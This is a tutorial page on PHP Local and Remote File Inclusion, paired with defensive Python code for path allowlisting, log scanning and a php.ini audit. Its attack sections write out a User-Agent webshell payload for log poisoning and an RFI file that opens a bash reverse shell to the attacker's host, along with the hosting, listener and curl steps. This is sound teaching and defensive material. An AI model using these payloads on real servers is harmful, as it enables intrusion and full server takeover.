File Inclusion

This vulnerability exists when a page includes a file whose name is taken from user input, and any code in the referenced file becomes part of the referencing page. In other words, the content of the retrieved file is interpreted and executed rather than just read and displayed.

There are two subclasses of this vulnerability: Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI is limited to including files that already exist on the web server, whereas RFI includes files fetched from outside the web server.
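As an added example (not code from the original page), the following Python models the difference between an unvalidated include and a hardened one. unsafe_resolve mirrors what include($_GET['file']) does with an absolute path or a '../' sequence; safe_resolve applies the standard mitigation of accepting only a bare page name, mapping it onto a fixed directory and confirming the resolved file still sits inside that directory. The pages directory, page names and probe values are constructed for the demo.

```python
import os
import re
import tempfile

# Bare page names only: no '/', no '..', no ':', no extension.
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")


def unsafe_resolve(base_dir: str, requested: str) -> str:
    """Model of include($_GET['file']) with no validation.

    An absolute `requested` replaces base_dir entirely, and '../' segments walk
    out of it, so the requester decides which file on the server gets included.
    """
    return os.path.normpath(os.path.join(base_dir, requested))


def safe_resolve(base_dir: str, requested: str) -> str:
    """Return the file to include, or raise ValueError for anything off the allowlist."""
    # Remote URLs and PHP stream wrappers share the '://' form; refuse them first
    # so an RFI attempt gets a distinct error regardless of allow_url_include.
    if "://" in requested:
        raise ValueError("wrappers and URLs are not allowed")
    # A strict pattern leaves no way to express '/', '..', ':' or a null byte.
    if not PAGE_NAME.fullmatch(requested):
        raise ValueError("include parameter is not a bare page name")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested + ".php"))
    # Defense in depth: after symlink resolution the file must still sit under base.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes the pages directory")
    if not os.path.isfile(candidate):
        raise ValueError("unknown page")
    return candidate


def demo() -> dict:
    """Run both resolvers over constructed probes against a temporary pages directory."""
    pages = tempfile.mkdtemp(prefix="pages-")
    for name in ("home", "about"):
        with open(os.path.join(pages, name + ".php"), "w", encoding="utf-8") as fh:
            fh.write("<?php echo 'page: " + name + "'; ?>\n")
    probes = [
        "about",                                  # legitimate page name
        "../../../../var/log/apache2/access.log", # LFI: walk up to the web server log
        "/var/log/apache2/access.log",            # LFI: absolute path to the same log
        "http://attacker.example/shell.txt",      # RFI: hypothetical remote host
    ]
    results = {}
    for probe in probes:
        try:
            verdict = "allowed: " + safe_resolve(pages, probe)
        except ValueError as err:
            verdict = "rejected: " + str(err)
        results[probe] = (unsafe_resolve(pages, probe), verdict)
    return results


if __name__ == "__main__":
    for probe, (unsafe_path, verdict) in demo().items():
        print(f"{probe!r}\n  unsafe -> {unsafe_path}\n  safe   -> {verdict}")
```

The allowlist pattern does the real work; the realpath containment check is there so that a later change to the pattern (or a symlink inside the pages directory) cannot silently reopen the hole.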

LFI

Log Poisoning

Log poisoning is where you inject code into the server's log file and then execute that code by including the log file through the LFI vulnerability.

Modifying User-Agent

Using Burp Suite or ZAP, modify the User-Agent to:

User-Agent: <?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
  • The <pre> is used to preserve any line breaks in the output. Without it, multi-line output runs together in the rendered page and is easier to read by viewing the page source.

  • The shell_exec executes OS commands

    • Another command that can be used is system

  • The $_GET is an associative array of variables that are passed as URL parameters.

Then include the log file using the LFI.

curl 'http://vulnsite.com/index.php?file=<path to log>&cmd=<command>'
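Both halves of the log poisoning technique above leave traces in the access log: the request that plants the PHP tag in a logged header, and the later request that includes the log file and passes a command parameter. As an added example (not part of the original page), this Python scanner parses combined-format log lines and flags those indicators; the four log lines, the hostnames and the list of include-style parameter names are constructed for the demo.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# PHP open tags; a logged header carrying one is a poisoning attempt.
PHP_TAG = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
# Request parameters that applications commonly pass straight to include().
INCLUDE_PARAMS = ("file", "page", "include", "path", "template")
LOG_HINTS = ("/var/log/", "access.log", "error.log", "access_log", "error_log")

# Constructed sample log: one normal request, then the two halves of a
# log-poisoning attempt, then an RFI attempt. Hosts are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:13:55:36 +0000] "GET /index.php?file=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:13:56:01 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']); ?>"
198.51.100.7 - - [10/Mar/2024:13:56:40 +0000] "GET /index.php?file=../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9812 "-" "curl/8.0.1"
198.51.100.9 - - [10/Mar/2024:13:57:12 +0000] "GET /index.php?file=http://attacker.example/shell.txt HTTP/1.1" 200 77 "-" "curl/8.0.1"
"""


def analyze_line(line: str) -> list:
    """Return the indicator names found in one combined-format log line."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return []
    f = m.groupdict()
    findings = []
    # Decode first so URL-encoded tags in a header are seen as well.
    if PHP_TAG.search(unquote(f["agent"])):
        findings.append("php-tag-in-user-agent")
    if PHP_TAG.search(unquote(f["referer"])):
        findings.append("php-tag-in-referer")
    parts = f["request"].split(" ")
    target = parts[1] if len(parts) >= 2 else ""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    suspicious_include = False
    for param in INCLUDE_PARAMS:
        for value in query.get(param, []):
            if "://" in value:
                findings.append(f"remote-url-in-{param}")
                suspicious_include = True
            elif "../" in value or value.startswith("/"):
                findings.append(f"traversal-or-absolute-in-{param}")
                suspicious_include = True
            if any(hint in value.lower() for hint in LOG_HINTS):
                findings.append(f"log-path-in-{param}")
                suspicious_include = True
    # A suspicious include plus a command parameter is the execution step.
    if suspicious_include and "cmd" in query:
        findings.append("command-parameter-with-include")
    return findings


def scan(log_text: str) -> list:
    """Scan a whole log; return one record per suspicious line."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        findings = analyze_line(line)
        if findings:
            host = LOG_RE.match(line).group("host")
            hits.append({"line": number, "host": host, "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Correlating the two halves by source host and time (here both come from 198.51.100.7 within a minute) is what turns two low-confidence alerts into a confident one; a header containing a PHP tag on its own is also worth alerting on, since it is never legitimate traffic.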

RFI

RFI is usually easier to exploit since you can host the malicious file to be included. However, this does require that allow_url_include and allow_url_fopen both be set to '1' in the PHP configuration (php.ini). By default allow_url_fopen is set to '1', but allow_url_include is set to '0'.

To exploit this:

  • Create a malicious php file

      <?php echo '<pre>' . shell_exec('/bin/bash -i >& /dev/tcp/<your ip>/<listen port> 0>&1') . '</pre>';?>
  • Host the shell with a web server

      sudo python3 -m http.server 80
  • Set up a listener

      sudo nc -nvlp <port>
  • Include the file using the RFI

      curl 'http://vulnsite.com/index.php?file=http://<your server>/<file>'
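Because RFI depends entirely on the two php.ini directives named above, the quickest defensive check is to read the configuration and compare it with the defaults. As an added example (not from the original page), this Python snippet parses php.ini-style text, applies the documented defaults (allow_url_fopen On, allow_url_include Off) for any directive that is absent, and reports a weak configuration next to a hardened one. The two ini fragments are constructed; the parser is a minimal one written for this example, not PHP's own.

```python
# Defaults documented by PHP, as stated on this page: allow_url_fopen On,
# allow_url_include Off. A missing directive therefore takes the default.
DEFAULTS = {"allow_url_fopen": True, "allow_url_include": False}

# Constructed php.ini fragments: the weak one enables remote includes, the
# hardened one turns both URL features off (only possible when nothing else
# in the application needs allow_url_fopen).
WEAK_INI = """\
[PHP]
; Fopen wrappers ;
allow_url_fopen = On
allow_url_include = On   ; enabled for a remote template, never reverted
"""

HARDENED_INI = """\
[PHP]
allow_url_fopen = Off
allow_url_include = Off
"""


def _truthy(value: str) -> bool:
    """Interpret PHP ini booleans: 1/On/True/Yes are true, everything else false."""
    return value.strip().strip("\"'").lower() in ("1", "on", "true", "yes")


def parse_php_ini(text: str) -> dict:
    """Minimal php.ini reader: ';' comments, [sections] skipped, key = value pairs."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # a ';' inside a quoted value is not handled
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip()
    return settings


def audit_url_includes(ini_text: str) -> tuple:
    """Return (effective settings, findings) for the two RFI-relevant directives."""
    settings = parse_php_ini(ini_text)
    effective = {
        key: _truthy(settings[key]) if key in settings else default
        for key, default in DEFAULTS.items()
    }
    findings = []
    if effective["allow_url_include"] and effective["allow_url_fopen"]:
        findings.append(("high", "allow_url_include and allow_url_fopen are both On: "
                                 "include/require will fetch remote URLs (RFI possible)"))
    elif effective["allow_url_include"]:
        findings.append(("medium", "allow_url_include is On; it is inert while "
                                   "allow_url_fopen is Off, but should still be turned Off"))
    elif effective["allow_url_fopen"]:
        findings.append(("info", "allow_url_fopen is On (PHP default): file functions "
                                 "accept URLs, include/require do not; disable if unused"))
    return effective, findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI), ("defaults", "")):
        effective, findings = audit_url_includes(ini)
        print(label, effective, findings)
```

Note that the audit only tells you whether the include() sink can reach the network; the LFI side of the same sink is unaffected by these directives and still needs input validation.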
